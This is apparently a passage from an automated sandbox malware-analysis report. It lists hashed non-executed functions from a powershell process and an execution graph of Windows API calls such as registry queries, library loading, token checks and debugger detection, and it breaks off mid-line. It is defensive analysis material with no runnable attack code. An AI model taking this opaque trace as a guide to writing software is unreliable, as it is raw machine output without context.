                                                                                                                                                    • Instruction Fuzzy Hash: 21C01230B15A1A4EDBD5A7381454275A0E1AF8C7047504478900EC72F1EC3D9802C740

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 00007FFECBFA2500 Relevance: .7, Instructions: 694COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1873488794.00007FFECBFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBFA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbfa0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f0a4181dc1fbb86e2c06fd4e0c7d0e5fc96c40877f3fd3f1a3fb2258d910a556
                                                                                                                                                    • Instruction ID: e177c2cfb1ef971443d7ace605703b2280ca73fe09ecef63005dd94407e8876d
                                                                                                                                                    • Opcode Fuzzy Hash: f0a4181dc1fbb86e2c06fd4e0c7d0e5fc96c40877f3fd3f1a3fb2258d910a556
                                                                                                                                                    • Instruction Fuzzy Hash: 52223230A28A594FD74CEF7840557BABBD2EF89205F5485BDA08EC72B2DE399842C741
                                                                                                                                                    Function 00007FFECBFA172F Relevance: .4, Instructions: 380COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1873488794.00007FFECBFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBFA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbfa0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d8c8504cd001bca1698dfe4caa93725ed48e04e63ba5532718d49e4251211e50
                                                                                                                                                    • Instruction ID: f3d3afe5105461cd198f3e0104b9a2506debdd43028430d749ff8fc1c1b636d5
                                                                                                                                                    • Opcode Fuzzy Hash: d8c8504cd001bca1698dfe4caa93725ed48e04e63ba5532718d49e4251211e50
                                                                                                                                                    • Instruction Fuzzy Hash: 7DC17530618A884FD359EF7844566BABBD1EF89305F5486BDE0CEC72B2DA399842C741
                                                                                                                                                    Function 00007FFECBFAAAD3 Relevance: .3, Instructions: 339COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1873488794.00007FFECBFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBFA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbfa0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8dcd6626561b5999e2aedb62004cfb624cce4934b73a2a0fc2cf9ffd08ca6ef7
                                                                                                                                                    • Instruction ID: 257750087e8f794b6349342a0c2665c60b03a1a3a581a8d107878db827f8f341
                                                                                                                                                    • Opcode Fuzzy Hash: 8dcd6626561b5999e2aedb62004cfb624cce4934b73a2a0fc2cf9ffd08ca6ef7
                                                                                                                                                    • Instruction Fuzzy Hash: B9B15530628A944FD34DEB7844566AABBD1EF8D205F54C5BDE4CEC72B2DE399802C741
                                                                                                                                                    Function 00007FFECBFA2212 Relevance: .3, Instructions: 307COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1873488794.00007FFECBFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBFA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbfa0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f351dd1b44b6ab62393543d4b042826d6618039e240d991d658177bf3299d1ab
                                                                                                                                                    • Instruction ID: 239caa71c11c92ffa9934df6b6049d73f815eedf0ff301796429263cdc81bb86
                                                                                                                                                    • Opcode Fuzzy Hash: f351dd1b44b6ab62393543d4b042826d6618039e240d991d658177bf3299d1ab
                                                                                                                                                    • Instruction Fuzzy Hash: D5A141306286984FD348EF7844566BABBE1EF8D215F54C9BDA0CEC7272DA399806D701
                                                                                                                                                    Function 00007FFECBFA14EE Relevance: .3, Instructions: 281COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1873488794.00007FFECBFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECBFA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecbfa0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a3860ed1a7e3eb70d176bf0cfb28c0ab50316383e293ae271970c90e9052fa5e
                                                                                                                                                    • Instruction ID: 252d9e53960141cc898d6a5496be1624316c6fb38ed798784fdff80740b83918
                                                                                                                                                    • Opcode Fuzzy Hash: a3860ed1a7e3eb70d176bf0cfb28c0ab50316383e293ae271970c90e9052fa5e
                                                                                                                                                    • Instruction Fuzzy Hash: 82918030A28A598FD75CEB3884556B9BBD1EF89305F5485BDE08EC72B3DE399842C740
                                                                                                                                                    Function 00007FFECC4B704A Relevance: .2, Instructions: 154COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.1902184315.00007FFECC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFECC4B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffecc4b0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f007989acfa05f0dd944c5f8cb28c8c742b874c712afb98b6d68b55e0fc893d0
                                                                                                                                                    • Instruction ID: bb0c0a8037ba091cddcd4a82e69c41ecbf92aac59bb07612db29efa6ca3bb7b6
                                                                                                                                                    • Opcode Fuzzy Hash: f007989acfa05f0dd944c5f8cb28c8c742b874c712afb98b6d68b55e0fc893d0
                                                                                                                                                    • Instruction Fuzzy Hash: 9E51E25048F7C21ECB9397B499645923FFA9D87530B0E81EBD5C8CE4A7D58E084AC363

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:6.9%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                    Signature Coverage:15%
                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                    Total number of Limit Nodes:77
                                                                                                                                                    execution_graph 71673 110179e0 GetTickCount 71680 110178f0 71673->71680 71681 11017910 71680->71681 71682 110179c6 71680->71682 71683 11017932 CoInitialize _GetRawWMIStringW 71681->71683 71685 11017929 WaitForSingleObject 71681->71685 71712 11162bb7 71682->71712 71686 110179b2 71683->71686 71689 11017965 71683->71689 71685->71683 71686->71682 71688 110179c0 CoUninitialize 71686->71688 71687 110179d5 71693 11017810 71687->71693 71688->71682 71689->71686 71690 110179ac 71689->71690 71720 111648ed 71689->71720 71725 111646f7 67 API calls __fassign 71690->71725 71694 11017830 71693->71694 71695 110178d6 71693->71695 71696 11017848 CoInitialize _GetRawWMIStringW 71694->71696 71698 1101783f WaitForSingleObject 71694->71698 71697 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 71695->71697 71699 110178c2 71696->71699 71702 1101787b 71696->71702 71700 110178e5 SetEvent GetTickCount 71697->71700 71698->71696 71699->71695 71701 110178d0 CoUninitialize 71699->71701 71706 11147060 71700->71706 71701->71695 71702->71699 71703 110178bc 71702->71703 71705 111648ed __hextodec 79 API calls 71702->71705 71728 111646f7 67 API calls __fassign 71703->71728 71705->71702 71707 11147071 71706->71707 71708 1114706c 71706->71708 71730 111464c0 71707->71730 71729 11146270 18 API calls std::_Mutex::_Mutex 71708->71729 71713 11162bc1 IsDebuggerPresent 71712->71713 71714 11162bbf 71712->71714 71726 111784f7 71713->71726 71714->71687 71717 1116cb59 SetUnhandledExceptionFilter UnhandledExceptionFilter 71718 1116cb76 __call_reportfault 71717->71718 71719 1116cb7e GetCurrentProcess TerminateProcess 71717->71719 71718->71719 71719->71687 71721 1116490d 71720->71721 71722 111648fb 71720->71722 71727 1116489c 79 API calls 2 library calls 71721->71727 71722->71689 71724 11164917 71724->71689 71725->71686 71726->71717 71727->71724 71728->71699 71729->71707 71733 11146370 71730->71733 71732 11017a27 71734 11146394 71733->71734 71735 11146399 71733->71735 71753 11146270 18 API calls std::_Mutex::_Mutex 71734->71753 71737 11146402 71735->71737 71738 111463a2 71735->71738 71739 111464ae 71737->71739 71740 1114640f wsprintfA 71737->71740 71741 111463d9 71738->71741 71744 111463b0 71738->71744 71742 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 71739->71742 71743 11146432 71740->71743 71747 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 71741->71747 71745 111464ba 71742->71745 71743->71743 71746 11146439 wvsprintfA 71743->71746 71749 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 71744->71749 71745->71732 71752 11146454 71746->71752 71748 111463fe 71747->71748 71748->71732 71750 111463d5 71749->71750 71750->71732 71751 111464a1 OutputDebugStringA 71751->71739 71752->71751 71752->71752 71753->71735 71754 110262c0 LoadLibraryA 71755 11031780 71756 1103178e 71755->71756 71760 11146a90 71756->71760 71759 110317af std::_Mutex::_Mutex 71763 11145be0 71760->71763 71764 11145bf0 71763->71764 71764->71764 71769 11110230 71764->71769 71766 11145c02 71776 11145b10 71766->71776 71768 1103179f SetUnhandledExceptionFilter 71768->71759 71787 11163a11 71769->71787 71772 11110247 71804 11029a70 265 API calls 2 library calls 71772->71804 71773 1111025e _memset 71773->71766 71777 11145b62 __crtLCMapStringA_stat 71776->71777 71778 11145b27 _strncpy 71776->71778 71813 11143300 MultiByteToWideChar 71777->71813 71778->71778 71780 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 71778->71780 71782 11145b5e 71780->71782 71781 11145b94 71814 11143340 WideCharToMultiByte GetLastError 71781->71814 71782->71768 71784 11145ba6 71785 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 71784->71785 71786 11145bb9 71785->71786 71786->71768 71788 11163a8e 71787->71788 71801 11163a1f 71787->71801 71811 1116e368 DecodePointer 71788->71811 71790 11163a2a 71790->71801 71805 1116e85d 66 API calls 2 library calls 71790->71805 71806 1116e6ae 66 API calls 7 library calls 71790->71806 71807 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 71790->71807 71791 11163a94 71812 1116a1af 66 API calls __getptd_noexit 71791->71812 71794 11163a4d RtlAllocateHeap 71795 1111023e 71794->71795 71794->71801 71795->71772 71795->71773 71797 11163a7a 71809 1116a1af 66 API calls __getptd_noexit 71797->71809 71801->71790 71801->71794 71801->71797 71802 11163a78 71801->71802 71808 1116e368 DecodePointer 71801->71808 71810 1116a1af 66 API calls __getptd_noexit 71802->71810 71805->71790 71806->71790 71808->71801 71809->71802 71810->71795 71811->71791 71812->71795 71813->71781 71814->71784 71815 11041180 71816 110411b2 71815->71816 71817 110411b8 71816->71817 71824 110411d4 71816->71824 71818 110fb470 15 API calls 71817->71818 71820 110411ca CloseHandle 71818->71820 71819 110412e8 71821 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 71819->71821 71820->71824 71823 110412f5 71821->71823 71822 11041268 71837 110fb470 GetTokenInformation 71822->71837 71824->71819 71826 1104120d 71824->71826 71847 110881d0 297 API calls 5 library calls 71824->71847 71826->71819 71826->71822 71828 1104127a 71829 11041282 CloseHandle 71828->71829 71832 11041289 71828->71832 71829->71832 71830 110412cb 71833 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 71830->71833 71831 110412b1 71834 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 71831->71834 71832->71830 71832->71831 71835 110412e4 71833->71835 71836 110412c7 71834->71836 71838 110fb4b8 71837->71838 71839 110fb4a7 71837->71839 71848 110f2300 9 API calls 71838->71848 71840 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 71839->71840 71842 110fb4b4 71840->71842 71842->71828 71843 110fb4dc 71843->71839 71844 110fb4e4 71843->71844 71845 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 71844->71845 71846 110fb50a 71845->71846 71846->71828 71847->71826 71848->71843 71849 11144dd0 71850 11144de1 71849->71850 71863 111447f0 71850->71863 71854 11144e2b 71855 11144e32 ResetEvent 71854->71855 71871 111449b0 265 API calls 2 library calls 71855->71871 71856 11144e82 71857 11144e65 71857->71856 71859 11144e64 71857->71859 71859->71857 71872 111449b0 265 API calls 2 library calls 71859->71872 71860 11144e46 SetEvent WaitForMultipleObjects 71860->71855 71860->71859 71862 11144e7f 71862->71856 71864 111447fc GetCurrentProcess 71863->71864 71865 1114481f 71863->71865 71864->71865 71866 1114480d GetModuleFileNameA 71864->71866 71869 11144849 WaitForMultipleObjects 71865->71869 71873 111101b0 71865->71873 71866->71865 71869->71854 71869->71857 71871->71860 71872->71862 71874 11163a11 _malloc 66 API calls 71873->71874 71875 111101ce 71874->71875 71876 11110203 _memset 71875->71876 71877 111101d7 wsprintfA 71875->71877 71880 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 71876->71880 71896 11029a70 265 API calls 2 library calls 71877->71896 71881 1111021d 71880->71881 71881->71869 71882 11144140 GetModuleFileNameA 71881->71882 71883 111441c3 71882->71883 71884 11144183 71882->71884 71887 111441cf LoadLibraryA 71883->71887 71888 111441e9 GetModuleHandleA GetProcAddress 71883->71888 71897 11081e00 71884->71897 71886 11144191 71886->71883 71889 11144198 LoadLibraryA 71886->71889 71887->71888 71890 111441de LoadLibraryA 71887->71890 71891 11144217 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 71888->71891 71892 11144209 71888->71892 71889->71883 71890->71888 71893 11144243 10 API calls 71891->71893 71892->71893 71894 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 71893->71894 71895 111442c0 71894->71895 71895->71869 71898 11081e13 _strrchr 71897->71898 71900 11081e2a std::_Mutex::_Mutex 71898->71900 71901 11081c50 IsDBCSLeadByte 71898->71901 71900->71886 71901->71900 71902 6ca863a0 71903 6ca863a5 71902->71903 71904 6ca863a9 WSACancelBlockingCall 71903->71904 71905 6ca863b1 Sleep 71903->71905 71906 6caa5ae6 71907 6caa5af1 ___security_init_cookie 71906->71907 71908 6caa5af6 71906->71908 71907->71908 71911 6caa59f0 71908->71911 71910 6caa5b04 71914 6caa59fc 71911->71914 71912 6caa5a41 __CRT_INIT 71913 6caa5a9d 71912->71913 71916 6caa5a54 71912->71916 71913->71910 71914->71912 71914->71913 71914->71916 71915 6caa5a91 __CRT_INIT 71915->71913 71917 6caa5a70 __CRT_INIT 71916->71917 71918 6caa5a82 71916->71918 71917->71918 71918->71913 71918->71915 71919 11174898 71942 1116c675 71919->71942 71921 111748b5 _LcidFromHexString 71922 111748c2 GetLocaleInfoA 71921->71922 71923 111748f5 71922->71923 71924 111748e9 71922->71924 71947 1116558e 85 API calls 2 library calls 71923->71947 71926 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 71924->71926 71928 11174a65 71926->71928 71927 11174901 71929 1117490b GetLocaleInfoA 71927->71929 71940 1117493b _LangCountryEnumProc@4 _strlen 71927->71940 71929->71924 71930 1117492a 71929->71930 71948 1116558e 85 API calls 2 library calls 71930->71948 71931 111749ae GetLocaleInfoA 71931->71924 71933 111749d1 71931->71933 71950 1116558e 85 API calls 2 library calls 71933->71950 71935 11174935 71935->71940 71949 11164644 85 API calls 2 library calls 71935->71949 71936 111749dc 71936->71924 71939 111749e4 _strlen 71936->71939 71951 1116558e 85 API calls 2 library calls 71936->71951 71939->71924 71952 1117483d GetLocaleInfoW _GetPrimaryLen _strlen 71939->71952 71940->71924 71940->71931 71953 1116c5fc GetLastError 71942->71953 71944 1116c67d 71945 1116c68a 71944->71945 71967 1116e66a 66 API calls 3 library calls 71944->71967 71945->71921 71947->71927 71948->71935 71949->71940 71950->71936 71951->71939 71952->71924 71968 1116c4ba TlsGetValue 71953->71968 71956 1116c669 SetLastError 71956->71944 71959 1116c62f DecodePointer 71960 1116c644 71959->71960 71961 1116c660 71960->71961 71962 1116c648 71960->71962 71978 11163aa5 71961->71978 71977 1116c548 66 API calls 4 library calls 71962->71977 71965 1116c650 GetCurrentThreadId 71965->71956 71966 1116c666 71966->71956 71969 1116c4cf DecodePointer TlsSetValue 71968->71969 71970 1116c4ea 71968->71970 71969->71970 71970->71956 71971 1116ac7e 71970->71971 71972 1116ac87 71971->71972 71974 1116acc4 71972->71974 71975 1116aca5 Sleep 71972->71975 71984 11170fc4 71972->71984 71974->71956 71974->71959 71976 1116acba 71975->71976 71976->71972 71976->71974 71977->71965 71979 11163ab0 HeapFree 71978->71979 71983 11163ad9 _free 71978->71983 71980 11163ac5 71979->71980 71979->71983 71995 1116a1af 66 API calls __getptd_noexit 71980->71995 71982 11163acb GetLastError 71982->71983 71983->71966 71985 11170fd0 71984->71985 71990 11170feb 71984->71990 71986 11170fdc 71985->71986 71985->71990 71993 1116a1af 66 API calls __getptd_noexit 71986->71993 71988 11170ffe RtlAllocateHeap 71988->71990 71992 11171025 71988->71992 71989 11170fe1 71989->71972 71990->71988 71990->71992 71994 1116e368 DecodePointer 71990->71994 71992->71972 71993->71989 71994->71990 71995->71982 71996 11030ef3 RegOpenKeyExA 71997 11030f20 71996->71997 71998 1103103d 71996->71998 72080 11143bd0 RegQueryValueExA 71997->72080 72000 11031061 71998->72000 72002 11031145 71998->72002 72006 111101b0 std::_Mutex::_Mutex 265 API calls 72000->72006 72004 111101b0 std::_Mutex::_Mutex 265 API calls 72002->72004 72003 11031030 RegCloseKey 72003->71998 72007 1103114c 72004->72007 72009 11031088 72006->72009 72231 110fae60 272 API calls std::_Mutex::_Mutex 72007->72231 72015 110312db GetStockObject GetObjectA 72009->72015 72010 111648ed __hextodec 79 API calls 72012 11030f6d 72010->72012 72013 11030f86 72012->72013 72014 111648ed __hextodec 79 API calls 72012->72014 72017 11163ca7 std::_Mutex::_Mutex 79 API calls 72013->72017 72014->72012 72016 1103130a SetErrorMode SetErrorMode 72015->72016 72019 111101b0 std::_Mutex::_Mutex 265 API calls 72016->72019 72021 11030f92 72017->72021 72020 11031346 72019->72020 72086 11028980 72020->72086 72021->72003 72022 11143bd0 std::_Mutex::_Mutex RegQueryValueExA 72021->72022 72024 11030fe8 72022->72024 72026 11143bd0 std::_Mutex::_Mutex RegQueryValueExA 72024->72026 72025 11031360 72028 111101b0 std::_Mutex::_Mutex 265 API calls 72025->72028 72027 11031011 72026->72027 72027->72003 72029 11031386 72028->72029 72030 11028980 268 API calls 72029->72030 72031 1103139f InterlockedExchange 72030->72031 72033 111101b0 std::_Mutex::_Mutex 265 API calls 72031->72033 72034 110313c7 72033->72034 72089 1108a880 72034->72089 72036 110313df GetACP 72100 11163f93 72036->72100 72041 11031410 72147 11143780 72041->72147 72044 111101b0 std::_Mutex::_Mutex 265 API calls 72045 1103145c 72044->72045 72153 11061aa0 72045->72153 72047 110314d4 72172 110ccc90 72047->72172 72050 111101b0 std::_Mutex::_Mutex 265 API calls 72052 110314ae 72050->72052 72232 11061710 72052->72232 72053 111101b0 std::_Mutex::_Mutex 265 API calls 72055 11031501 72053->72055 72179 11125d40 72055->72179 72081 11030f4a 72080->72081 72081->72003 72082 11163ca7 72081->72082 72083 11163c91 72082->72083 72245 1116450b 72083->72245 72087 11088b30 268 API calls 72086->72087 72088 1102898b _memset 72087->72088 72088->72025 72090 111101b0 std::_Mutex::_Mutex 265 API calls 72089->72090 72091 1108a8b7 72090->72091 72092 111101b0 std::_Mutex::_Mutex 265 API calls 72091->72092 72094 1108a8d9 InitializeCriticalSection 72091->72094 72095 1108a8d2 72092->72095 72096 1108a93a 72094->72096 72095->72094 72339 1116305a 66 API calls std::exception::_Copy_str 72095->72339 72096->72036 72098 1108a909 72340 111634b1 RaiseException 72098->72340 72101 11163fc6 72100->72101 72102 11163fb1 72100->72102 72101->72102 72103 11163fcd 72101->72103 72341 1116a1af 66 API calls __getptd_noexit 72102->72341 72343 1117027b 102 API calls 11 library calls 72103->72343 72106 11163fb6 72342 1116edc4 11 API calls __waccess_s 72106->72342 72107 11163ff3 72109 11031406 72107->72109 72344 111700e4 97 API calls 6 library calls 72107->72344 72111 111663a3 72109->72111 72112 111663af ___DllMainCRTStartup 72111->72112 72113 111663d0 72112->72113 72114 111663b9 72112->72114 72116 1116c675 __getptd 66 API calls 72113->72116 72370 1116a1af 66 API calls __getptd_noexit 72114->72370 72118 111663d5 72116->72118 72117 111663be 72371 1116edc4 11 API calls __waccess_s 72117->72371 72120 11171306 ____lc_handle_func 74 API calls 72118->72120 72121 111663df 72120->72121 72122 1116ac7e __calloc_crt 66 API calls 72121->72122 72123 111663f5 72122->72123 72124 111663c9 ___DllMainCRTStartup _setlocale 72123->72124 72125 1117459f __lock 66 API calls 72123->72125 72124->72041 72126 1116640b 72125->72126 72345 11165814 72126->72345 72133 111664ec 72376 111710d5 8 API calls 72133->72376 72134 1116643b __tzset_nolock 72137 1117459f __lock 66 API calls 72134->72137 72136 111664f2 72377 1117116e 66 API calls 4 library calls 72136->72377 72139 11166461 72137->72139 72372 111712b9 74 API calls 3 library calls 72139->72372 72141 11166473 72373 111710d5 8 API calls 72141->72373 72143 11166479 72144 11166497 72143->72144 72374 111712b9 74 API calls 3 library calls 72143->72374 72375 111664e1 LeaveCriticalSection _doexit 72144->72375 72529 11143690 72147->72529 72149 11143690 IsDBCSLeadByte 72150 11143795 72149->72150 72150->72149 72151 11166654 85 API calls std::_Mutex::_Mutex 72150->72151 72152 1103143c 72150->72152 72151->72150 72152->72044 72154 11061710 293 API calls 72153->72154 72155 11061ade 72154->72155 72156 111101b0 std::_Mutex::_Mutex 265 API calls 72155->72156 72157 11061b0b 72156->72157 72158 11061b24 72157->72158 72159 11061710 293 API calls 72157->72159 72160 111101b0 std::_Mutex::_Mutex 265 API calls 72158->72160 72159->72158 72161 11061b35 72160->72161 72162 11061710 293 API calls 72161->72162 72164 11061b4e 72161->72164 72162->72164 72163 11031487 72163->72047 72163->72050 72164->72163 72541 11142e60 72164->72541 72166 11061b76 72550 11061a70 72166->72550 72173 110ccc99 72172->72173 72174 110314fa 72172->72174 72708 11145410 GetSystemMetrics GetSystemMetrics 72173->72708 72174->72053 72176 110ccca0 std::_Mutex::_Mutex 72176->72174 72177 110cccae CreateWindowExA 72176->72177 72177->72174 72178 110cccd8 SetClassLongA 72177->72178 72178->72174 72180 111101b0 std::_Mutex::_Mutex 265 API calls 72179->72180 72181 11125d74 72180->72181 72182 11125da5 72181->72182 72183 11125d8a 72181->72183 72709 11124f70 72182->72709 72755 110765c0 465 API calls std::_Mutex::_Mutex 72183->72755 72185 11125d9a 72185->72182 72231->72009 72233 111101b0 std::_Mutex::_Mutex 265 API calls 72232->72233 72234 11061761 72233->72234 72235 11061777 InitializeCriticalSection 72234->72235 73867 11061210 266 API calls 3 library calls 72234->73867 72238 110617b7 72235->72238 72243 11061826 72235->72243 73868 1105f830 287 API calls 3 library calls 72238->73868 72240 110617d8 RegCreateKeyExA 72241 11061832 RegCreateKeyExA 72240->72241 72242 110617ff RegCreateKeyExA 72240->72242 72241->72243 72244 11061865 RegCreateKeyExA 72241->72244 72242->72241 72242->72243 72243->72047 72244->72243 72246 11164524 72245->72246 72249 111642e0 72246->72249 72261 11164259 72249->72261 72251 11164304 72269 1116a1af 66 API calls __getptd_noexit 72251->72269 72254 11164309 72270 1116edc4 11 API calls __waccess_s 72254->72270 72257 1116433a 72259 11164381 72257->72259 72271 11171a63 79 API calls 3 library calls 72257->72271 72258 11030f5e 72258->72010 72259->72258 72272 1116a1af 66 API calls __getptd_noexit 72259->72272 72262 1116426c 72261->72262 72268 111642b9 72261->72268 72263 1116c675 __getptd 66 API calls 72262->72263 72264 11164271 72263->72264 72265 11164299 72264->72265 72273 11171306 72264->72273 72265->72268 72288 111715a2 68 API calls 6 library calls 72265->72288 72268->72251 72268->72257 72269->72254 72270->72258 72271->72257 72272->72258 72274 11171312 ___DllMainCRTStartup 72273->72274 72275 1116c675 __getptd 66 API calls 72274->72275 72276 11171317 72275->72276 72277 11171345 72276->72277 72278 11171329 72276->72278 72290 1117459f 72277->72290 72280 1116c675 __getptd 66 API calls 72278->72280 72282 1117132e 72280->72282 72281 1117134c 72297 111712b9 74 API calls 3 library calls 72281->72297 72286 1117133c ___DllMainCRTStartup 72282->72286 72289 1116e66a 66 API calls 3 library calls 72282->72289 72284 11171360 72298 11171373 LeaveCriticalSection _doexit 72284->72298 72286->72265 72288->72268 72291 111745c7 EnterCriticalSection 72290->72291 72292 111745b4 72290->72292 72291->72281 72299 111744dd 72292->72299 72294 111745ba 72294->72291 72326 1116e66a 66 API calls 3 library calls 72294->72326 72297->72284 72298->72282 72300 111744e9 ___DllMainCRTStartup 72299->72300 72301 11174511 72300->72301 72302 111744f9 72300->72302 72308 1117451f ___DllMainCRTStartup 72301->72308 72330 1116ac39 72301->72330 72327 1116e85d 66 API calls 2 library calls 72302->72327 72304 111744fe 72328 1116e6ae 66 API calls 7 library calls 72304->72328 72308->72294 72309 11174505 72329 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 72309->72329 72310 11174531 72336 1116a1af 66 API calls __getptd_noexit 72310->72336 72311 11174540 72314 1117459f __lock 65 API calls 72311->72314 72315 11174547 72314->72315 72317 1117454f InitializeCriticalSectionAndSpinCount 72315->72317 72318 1117457a 72315->72318 72319 1117456b 72317->72319 72320 1117455f 72317->72320 72321 11163aa5 _free 65 API calls 72318->72321 72338 11174596 LeaveCriticalSection _doexit 72319->72338 72322 11163aa5 _free 65 API calls 72320->72322 72321->72319 72323 11174565 72322->72323 72337 1116a1af 66 API calls __getptd_noexit 72323->72337 72327->72304 72328->72309 72332 1116ac42 72330->72332 72331 11163a11 _malloc 65 API calls 72331->72332 72332->72331 72333 1116ac78 72332->72333 72334 1116ac59 Sleep 72332->72334 72333->72310 72333->72311 72335 1116ac6e 72334->72335 72335->72332 72335->72333 72336->72308 72337->72319 72338->72308 72339->72098 72340->72094 72341->72106 72342->72109 72343->72107 72344->72109 72346 1116581d 72345->72346 72347 11165836 72345->72347 72346->72347 72378 11171046 8 API calls 72346->72378 72349 111664d5 72347->72349 72379 111744c6 LeaveCriticalSection 72349->72379 72351 11166422 72352 11166187 72351->72352 72353 111661b0 72352->72353 72356 111661cb 72352->72356 72354 11165e4d __setlocale_set_cat 101 API calls 72353->72354 72357 111661ba 72353->72357 72354->72357 72355 1116631c 72380 11165c2c 72355->72380 72356->72355 72364 111662f5 72356->72364 72366 11166200 _strpbrk _strncmp _strcspn _strlen 72356->72366 72359 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 72357->72359 72361 111663a1 72359->72361 72361->72133 72361->72134 72362 11166331 __tzset_nolock 72362->72357 72362->72364 72394 11165e4d 72362->72394 72364->72357 72440 11165ac7 70 API calls 6 library calls 72364->72440 72366->72357 72366->72364 72367 1116630e 72366->72367 72368 11165e4d __setlocale_set_cat 101 API calls 72366->72368 72436 111699f9 66 API calls __waccess_s 72366->72436 72437 1116ed72 72367->72437 72368->72366 72370->72117 72371->72124 72372->72141 72373->72143 72374->72144 72375->72124 72376->72136 72377->72124 72378->72347 72379->72351 72381 1116c675 __getptd 66 API calls 72380->72381 72382 11165c67 72381->72382 72391 11165ccd __tzset_nolock _memmove _strlen 72382->72391 72392 11165cd4 72382->72392 72484 1116cd5f 72382->72484 72383 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 72384 11165e4b 72383->72384 72384->72362 72387 1116ed72 __invoke_watson 10 API calls 72387->72391 72389 1116cd5f _strcpy_s 66 API calls 72389->72391 72391->72387 72391->72389 72391->72392 72441 1116593d 72391->72441 72448 11174bcc 72391->72448 72493 11165a5c 66 API calls 3 library calls 72391->72493 72494 111699f9 66 API calls __waccess_s 72391->72494 72392->72383 72395 1116c675 __getptd 66 API calls 72394->72395 72396 11165e7a 72395->72396 72397 11165c2c __expandlocale 96 API calls 72396->72397 72401 11165ea2 __tzset_nolock _strlen 72397->72401 72398 11165ea9 72399 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 72398->72399 72400 11165eb7 72399->72400 72400->72362 72401->72398 72402 1116ac39 __malloc_crt 66 API calls 72401->72402 72403 11165ef3 _memmove 72402->72403 72403->72398 72404 1116cd5f _strcpy_s 66 API calls 72403->72404 72411 11165f66 _memmove 72404->72411 72405 11166155 72406 1116ed72 __invoke_watson 10 API 